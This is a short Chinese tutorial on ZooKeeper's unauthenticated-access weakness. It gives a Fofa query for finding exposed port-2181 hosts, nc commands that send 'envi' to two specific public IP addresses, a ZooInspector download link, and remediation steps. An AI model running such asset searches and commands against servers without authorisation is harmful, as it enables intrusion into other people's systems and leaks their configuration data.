Zookeeper未授权访问漏洞

1.Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是 2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:ki命令)。攻击者能够执行所有只允许由管理员运行的命令。

步骤一:使用以下Fofa语法搜索资产信息.

port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试

echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181

 步骤三:可使用Zookeeper可视化管理工具进行连接.

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

》》》漏洞修复《《《
1.修改 ZooKeeper 默认端口,采用其他端口服务。
2.添加访问控制,配置服务来源地址限制策略。
3.增加 ZooKeeper 的认证配置。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值